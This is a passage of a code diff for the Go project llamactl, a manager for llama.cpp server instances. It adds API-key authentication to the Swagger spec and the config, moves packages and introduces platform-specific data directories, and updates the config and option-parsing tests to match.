- ApiKeyAuth: []
|
||||
summary: Stop a running instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -685,6 +707,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List available devices for llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -700,6 +724,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get help for llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -715,6 +741,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get version of llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -723,7 +751,8 @@ paths:
|
||||
consumes:
|
||||
- application/json
|
||||
description: Handles all POST requests to /v1/*, routing to the appropriate
|
||||
instance based on the request body
|
||||
instance based on the request body. Requires API key authentication via the
|
||||
`Authorization` header.
|
||||
responses:
|
||||
"200":
|
||||
description: OpenAI response
|
||||
@@ -735,6 +764,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: OpenAI-compatible proxy endpoint
|
||||
tags:
|
||||
- openai
|
||||
@@ -751,6 +782,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List instances in OpenAI-compatible format
|
||||
tags:
|
||||
- openai
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package llamacpp
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
@@ -1,17 +1,16 @@
|
||||
package llamactl_test
|
||||
package llamacpp_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"reflect"
|
||||
"slices"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options llamactl.LlamaServerOptions
|
||||
options llamacpp.LlamaServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "verbose true",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
},
|
||||
expected: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "verbose false",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: false,
|
||||
},
|
||||
excluded: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
FlashAttn: true,
|
||||
Mlock: false,
|
||||
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
Threads: 4,
|
||||
CtxSize: 2048,
|
||||
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
Threads: 0, // Should be excluded
|
||||
Temperature: 0, // Should be excluded
|
||||
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||
DrySequenceBreaker: []string{".", "!", "?"},
|
||||
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Lora: []string{}, // Empty array should not generate args
|
||||
OverrideTensor: []string{}, // Empty array should not generate args
|
||||
}
|
||||
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
|
||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||
// Test snake_case to kebab-case conversion
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
ThreadsBatch: 2,
|
||||
@@ -235,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
"temperature": 0.7
|
||||
}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
jsonData string
|
||||
checkFn func(llamactl.LlamaServerOptions) error
|
||||
checkFn func(llamacpp.LlamaServerOptions) error
|
||||
}{
|
||||
{
|
||||
name: "threads alternatives",
|
||||
jsonData: `{"t": 4, "tb": 2}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Threads != 4 {
|
||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||
}
|
||||
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "context size alternatives",
|
||||
jsonData: `{"c": 2048}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.CtxSize != 2048 {
|
||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "gpu layers alternatives",
|
||||
jsonData: `{"ngl": 16}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.GPULayers != 16 {
|
||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "model alternatives",
|
||||
jsonData: `{"m": "/path/model.gguf"}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "temperature alternatives",
|
||||
jsonData: `{"temp": 0.8}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Temperature != 0.8 {
|
||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||
}
|
||||
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for invalid JSON")
|
||||
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
"dry_sequence_breaker": [".", "!", "?"]
|
||||
}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package config
|
||||
|
||||
import (
|
||||
"os"
|
||||
@@ -10,10 +10,11 @@ import (
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// Config represents the configuration for llamactl
|
||||
type Config struct {
|
||||
// AppConfig represents the configuration for llamactl
|
||||
type AppConfig struct {
|
||||
Server ServerConfig `yaml:"server"`
|
||||
Instances InstancesConfig `yaml:"instances"`
|
||||
Auth AuthConfig `yaml:"auth"`
|
||||
}
|
||||
|
||||
// ServerConfig contains HTTP server configuration
|
||||
@@ -26,6 +27,9 @@ type ServerConfig struct {
|
||||
|
||||
// Allowed origins for CORS (e.g., "http://localhost:3000")
|
||||
AllowedOrigins []string `yaml:"allowed_origins"`
|
||||
|
||||
// Enable Swagger UI for API documentation
|
||||
EnableSwagger bool `yaml:"enable_swagger"`
|
||||
}
|
||||
|
||||
// InstancesConfig contains instance management configuration
|
||||
@@ -33,8 +37,17 @@ type InstancesConfig struct {
|
||||
// Port range for instances (e.g., 8000,9000)
|
||||
PortRange [2]int `yaml:"port_range"`
|
||||
|
||||
// Directory where instance logs will be stored
|
||||
LogDirectory string `yaml:"log_directory"`
|
||||
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
|
||||
DataDir string `yaml:"data_dir"`
|
||||
|
||||
// Instance config directory override
|
||||
InstancesDir string `yaml:"configs_dir"`
|
||||
|
||||
// Logs directory override
|
||||
LogsDir string `yaml:"logs_dir"`
|
||||
|
||||
// Automatically create the data directory if it doesn't exist
|
||||
AutoCreateDirs bool `yaml:"auto_create_dirs"`
|
||||
|
||||
// Maximum number of instances that can be created
|
||||
MaxInstances int `yaml:"max_instances"`
|
||||
@@ -52,27 +65,53 @@ type InstancesConfig struct {
|
||||
DefaultRestartDelay int `yaml:"default_restart_delay"`
|
||||
}
|
||||
|
||||
// AuthConfig contains authentication settings
|
||||
type AuthConfig struct {
|
||||
|
||||
// Require authentication for OpenAI compatible inference endpoints
|
||||
RequireInferenceAuth bool `yaml:"require_inference_auth"`
|
||||
|
||||
// List of keys for OpenAI compatible inference endpoints
|
||||
InferenceKeys []string `yaml:"inference_keys"`
|
||||
|
||||
// Require authentication for management endpoints
|
||||
RequireManagementAuth bool `yaml:"require_management_auth"`
|
||||
|
||||
// List of keys for management endpoints
|
||||
ManagementKeys []string `yaml:"management_keys"`
|
||||
}
|
||||
|
||||
// LoadConfig loads configuration with the following precedence:
|
||||
// 1. Hardcoded defaults
|
||||
// 2. Config file
|
||||
// 3. Environment variables
|
||||
func LoadConfig(configPath string) (Config, error) {
|
||||
func LoadConfig(configPath string) (AppConfig, error) {
|
||||
// 1. Start with defaults
|
||||
cfg := Config{
|
||||
cfg := AppConfig{
|
||||
Server: ServerConfig{
|
||||
Host: "0.0.0.0",
|
||||
Port: 8080,
|
||||
AllowedOrigins: []string{"*"}, // Default to allow all origins
|
||||
EnableSwagger: false,
|
||||
},
|
||||
Instances: InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/llamactl",
|
||||
DataDir: getDefaultDataDirectory(),
|
||||
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
|
||||
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
|
||||
AutoCreateDirs: true,
|
||||
MaxInstances: -1, // -1 means unlimited
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
},
|
||||
Auth: AuthConfig{
|
||||
RequireInferenceAuth: true,
|
||||
InferenceKeys: []string{},
|
||||
RequireManagementAuth: true,
|
||||
ManagementKeys: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
// 2. Load from config file
|
||||
@@ -87,7 +126,7 @@ func LoadConfig(configPath string) (Config, error) {
|
||||
}
|
||||
|
||||
// loadConfigFile attempts to load config from file with fallback locations
|
||||
func loadConfigFile(cfg *Config, configPath string) error {
|
||||
func loadConfigFile(cfg *AppConfig, configPath string) error {
|
||||
var configLocations []string
|
||||
|
||||
// If specific config path provided, use only that
|
||||
@@ -111,7 +150,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
|
||||
}
|
||||
|
||||
// loadEnvVars overrides config with environment variables
|
||||
func loadEnvVars(cfg *Config) {
|
||||
func loadEnvVars(cfg *AppConfig) {
|
||||
// Server config
|
||||
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
|
||||
cfg.Server.Host = host
|
||||
@@ -121,6 +160,30 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Server.Port = p
|
||||
}
|
||||
}
|
||||
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
|
||||
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
|
||||
}
|
||||
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
|
||||
if b, err := strconv.ParseBool(enableSwagger); err == nil {
|
||||
cfg.Server.EnableSwagger = b
|
||||
}
|
||||
}
|
||||
|
||||
// Data config
|
||||
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
|
||||
cfg.Instances.DataDir = dataDir
|
||||
}
|
||||
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
|
||||
cfg.Instances.InstancesDir = instancesDir
|
||||
}
|
||||
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
|
||||
cfg.Instances.LogsDir = logsDir
|
||||
}
|
||||
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
|
||||
if b, err := strconv.ParseBool(autoCreate); err == nil {
|
||||
cfg.Instances.AutoCreateDirs = b
|
||||
}
|
||||
}
|
||||
|
||||
// Instance config
|
||||
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
|
||||
@@ -128,9 +191,6 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Instances.PortRange = ports
|
||||
}
|
||||
}
|
||||
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
|
||||
cfg.Instances.LogDirectory = logDir
|
||||
}
|
||||
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
|
||||
if m, err := strconv.Atoi(maxInstances); err == nil {
|
||||
cfg.Instances.MaxInstances = m
|
||||
@@ -154,6 +214,23 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Instances.DefaultRestartDelay = seconds
|
||||
}
|
||||
}
|
||||
// Auth config
|
||||
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
|
||||
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
|
||||
cfg.Auth.RequireInferenceAuth = b
|
||||
}
|
||||
}
|
||||
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
|
||||
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
|
||||
}
|
||||
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
|
||||
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
|
||||
cfg.Auth.RequireManagementAuth = b
|
||||
}
|
||||
}
|
||||
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
|
||||
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
|
||||
}
|
||||
}
|
||||
|
||||
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
|
||||
@@ -179,64 +256,63 @@ func ParsePortRange(s string) [2]int {
|
||||
return [2]int{0, 0} // Invalid format
|
||||
}
|
||||
|
||||
// getDefaultDataDirectory returns platform-specific default data directory
|
||||
func getDefaultDataDirectory() string {
|
||||
switch runtime.GOOS {
|
||||
case "windows":
|
||||
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
|
||||
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
||||
return filepath.Join(programData, "llamactl")
|
||||
}
|
||||
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
|
||||
return filepath.Join(localAppData, "llamactl")
|
||||
}
|
||||
return "C:\\ProgramData\\llamactl" // Final fallback
|
||||
|
||||
case "darwin":
|
||||
// For macOS, use user's Application Support directory
|
||||
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
|
||||
}
|
||||
return "/usr/local/var/llamactl" // Fallback
|
||||
|
||||
default:
|
||||
// Linux and other Unix-like systems
|
||||
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||
return filepath.Join(homeDir, ".local", "share", "llamactl")
|
||||
}
|
||||
return "/var/lib/llamactl" // Final fallback
|
||||
}
|
||||
}
|
||||
|
||||
// getDefaultConfigLocations returns platform-specific config file locations
|
||||
func getDefaultConfigLocations() []string {
|
||||
var locations []string
|
||||
|
||||
// Current directory (cross-platform)
|
||||
locations = append(locations,
|
||||
"./llamactl.yaml",
|
||||
"./config.yaml",
|
||||
)
|
||||
|
||||
homeDir, _ := os.UserHomeDir()
|
||||
|
||||
switch runtime.GOOS {
|
||||
case "windows":
|
||||
// Windows: Use APPDATA and ProgramData
|
||||
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
|
||||
if appData := os.Getenv("APPDATA"); appData != "" {
|
||||
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
|
||||
}
|
||||
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
||||
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
|
||||
}
|
||||
// Fallback to user home
|
||||
if homeDir != "" {
|
||||
} else if homeDir != "" {
|
||||
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
|
||||
}
|
||||
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
|
||||
|
||||
case "darwin":
|
||||
// macOS: Use proper Application Support directories
|
||||
// macOS: Use Application Support in user home, fallback to /Library/Application Support
|
||||
if homeDir != "" {
|
||||
locations = append(locations,
|
||||
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
|
||||
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
|
||||
)
|
||||
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
|
||||
}
|
||||
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
|
||||
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
|
||||
|
||||
default:
|
||||
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
|
||||
configHome := os.Getenv("XDG_CONFIG_HOME")
|
||||
if configHome == "" && homeDir != "" {
|
||||
configHome = filepath.Join(homeDir, ".config")
|
||||
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
|
||||
if homeDir != "" {
|
||||
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
|
||||
}
|
||||
if configHome != "" {
|
||||
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
|
||||
}
|
||||
|
||||
// System config: /etc/llamactl/config.yaml
|
||||
locations = append(locations, "/etc/llamactl/config.yaml")
|
||||
|
||||
// Additional system locations
|
||||
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
|
||||
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
|
||||
if dir != "" {
|
||||
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return locations
|
||||
@@ -1,16 +1,15 @@
|
||||
package llamactl_test
|
||||
package config_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/config"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestLoadConfig_Defaults(t *testing.T) {
|
||||
// Test loading config when no file exists and no env vars set
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig should not error with defaults: %v", err)
|
||||
}
|
||||
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
|
||||
if cfg.Server.Port != 8080 {
|
||||
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
|
||||
}
|
||||
|
||||
homedir, err := os.UserHomeDir()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get user home directory: %v", err)
|
||||
}
|
||||
|
||||
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
|
||||
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
|
||||
}
|
||||
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
|
||||
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
|
||||
}
|
||||
if !cfg.Instances.AutoCreateDirs {
|
||||
t.Error("Expected default instances auto-create to be true")
|
||||
}
|
||||
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
||||
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
|
||||
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != -1 {
|
||||
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
||||
}
|
||||
@@ -56,7 +67,7 @@ server:
|
||||
port: 9090
|
||||
instances:
|
||||
port_range: [7000, 8000]
|
||||
log_directory: "/custom/logs"
|
||||
logs_dir: "/custom/logs"
|
||||
max_instances: 5
|
||||
llama_executable: "/usr/bin/llama-server"
|
||||
default_auto_restart: false
|
||||
@@ -69,7 +80,7 @@ instances:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -84,8 +95,8 @@ instances:
|
||||
if cfg.Instances.PortRange != [2]int{7000, 8000} {
|
||||
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/custom/logs" {
|
||||
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
|
||||
if cfg.Instances.LogsDir != "/custom/logs" {
|
||||
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != 5 {
|
||||
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
|
||||
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
"LLAMACTL_HOST": "0.0.0.0",
|
||||
"LLAMACTL_PORT": "3000",
|
||||
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
|
||||
"LLAMACTL_LOG_DIR": "/env/logs",
|
||||
"LLAMACTL_LOGS_DIR": "/env/logs",
|
||||
"LLAMACTL_MAX_INSTANCES": "20",
|
||||
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
|
||||
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
|
||||
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
defer os.Unsetenv(key)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
if cfg.Instances.PortRange != [2]int{5000, 6000} {
|
||||
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/env/logs" {
|
||||
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
|
||||
if cfg.Instances.LogsDir != "/env/logs" {
|
||||
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != 20 {
|
||||
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
|
||||
@@ -183,7 +194,7 @@ instances:
|
||||
defer os.Unsetenv("LLAMACTL_HOST")
|
||||
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -219,7 +230,7 @@ instances:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
_, err = llamactl.LoadConfig(configFile)
|
||||
_, err = config.LoadConfig(configFile)
|
||||
if err == nil {
|
||||
t.Error("Expected LoadConfig to return error for invalid YAML")
|
||||
}
|
||||
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := llamactl.ParsePortRange(tt.input)
|
||||
result := config.ParsePortRange(tt.input)
|
||||
if result != tt.expected {
|
||||
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
|
||||
}
|
||||
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
testCases := []struct {
|
||||
envVar string
|
||||
envValue string
|
||||
checkFn func(*llamactl.Config) bool
|
||||
checkFn func(*config.AppConfig) bool
|
||||
desc string
|
||||
}{
|
||||
{
|
||||
envVar: "LLAMACTL_PORT",
|
||||
envValue: "invalid-port",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
desc: "invalid port number should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_MAX_INSTANCES",
|
||||
envValue: "not-a-number",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
desc: "invalid max instances should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
||||
envValue: "invalid-bool",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
desc: "invalid boolean should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
||||
envValue: "invalid-range",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
desc: "invalid port range should keep default",
|
||||
},
|
||||
}
|
||||
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
